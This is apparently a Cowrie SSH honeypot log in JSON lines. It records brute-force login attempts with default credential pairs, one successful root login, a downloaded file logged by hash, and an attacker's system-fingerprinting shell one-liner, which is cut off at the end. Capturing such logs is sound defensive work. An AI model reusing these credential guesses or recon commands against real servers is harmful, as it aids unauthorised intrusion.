{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.025416Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.026759Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.027371Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.028163Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.029135Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.029750Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.030298Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.030967Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.031635Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.032226Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.802860Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.8","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.803747Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:53:54.804853Z","src_ip":"212.227.235.229","session":"4c5ccb7841bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:53:55.702430Z","src_ip":"212.227.235.229","session":"2c7eb71511f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:53:55.713680Z","src_ip":"212.227.235.229","session":"2c7eb71511f6"}
{"eventid":"cowrie.login.failed","username":"observer","password":"observer123","message":"login attempt [observer/observer123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:53:57.442865Z","src_ip":"212.227.125.160","session":"633299299561"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54696,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f5b648ff9f0","protocol":"ssh","message":"New connection: 212.227.235.229:54696 (1.2.3.4:22) [session: 5f5b648ff9f0]","sensor":"my-vps","timestamp":"2025-08-31T04:54:01.212502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:01.358528Z","src_ip":"212.227.235.229","session":"5f5b648ff9f0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:01.463801Z","src_ip":"212.227.235.229","session":"5f5b648ff9f0"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:02.612317Z","src_ip":"212.227.235.229","session":"5f5b648ff9f0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54726,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a3b446952ce","protocol":"ssh","message":"New connection: 212.227.235.229:54726 (1.2.3.4:22) [session: 1a3b446952ce]","sensor":"my-vps","timestamp":"2025-08-31T04:54:02.828159Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:02.843925Z","src_ip":"212.227.235.229","session":"1a3b446952ce"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:03.932569Z","src_ip":"212.227.235.229","session":"5f5b648ff9f0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:04.092573Z","src_ip":"212.227.235.229","session":"1a3b446952ce"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:05.118264Z","src_ip":"212.227.235.229","session":"1a3b446952ce"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:54:06.448071Z","src_ip":"212.227.235.229","session":"1a3b446952ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35582,"dst_ip":"1.2.3.4","dst_port":22,"session":"a358b54b0293","protocol":"ssh","message":"New connection: 212.227.125.160:35582 (1.2.3.4:22) [session: a358b54b0293]","sensor":"my-vps","timestamp":"2025-08-31T04:54:06.451572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:54:06.924559Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:54:06.925480Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34828,"dst_ip":"1.2.3.4","dst_port":22,"session":"59c9c901c6d3","protocol":"ssh","message":"New connection: 212.227.235.229:34828 (1.2.3.4:22) [session: 59c9c901c6d3]","sensor":"my-vps","timestamp":"2025-08-31T04:54:07.577793Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:07.718788Z","src_ip":"212.227.235.229","session":"59c9c901c6d3"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T04:54:07.894767Z","src_ip":"212.227.235.229","session":"59c9c901c6d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56770,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4c3c5f4567b","protocol":"ssh","message":"New connection: 212.227.125.160:56770 (1.2.3.4:22) [session: d4c3c5f4567b]","sensor":"my-vps","timestamp":"2025-08-31T04:54:08.370983Z"}
{"eventid":"cowrie.login.failed","username":"secret","password":"secret","message":"login attempt [secret/secret] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:09.310782Z","src_ip":"212.227.235.229","session":"59c9c901c6d3"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567","message":"login attempt [root/1234567] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:54:09.529332Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":22983,"dst_ip":"1.2.3.4","dst_port":22,"session":"935762140a58","protocol":"ssh","message":"New connection: 212.227.125.160:22983 (1.2.3.4:22) [session: 935762140a58]","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.034371Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.035990Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.120290Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp","message":"login attempt [ftp/ftp] failed","sensor":"my-vps","timestamp":"2025-08-31T04:54:10.504144Z","src_ip":"212.227.125.160","session":"935762140a58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:54:10.694118Z","src_ip":"212.227.125.160","session":"a358b54b0293"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; 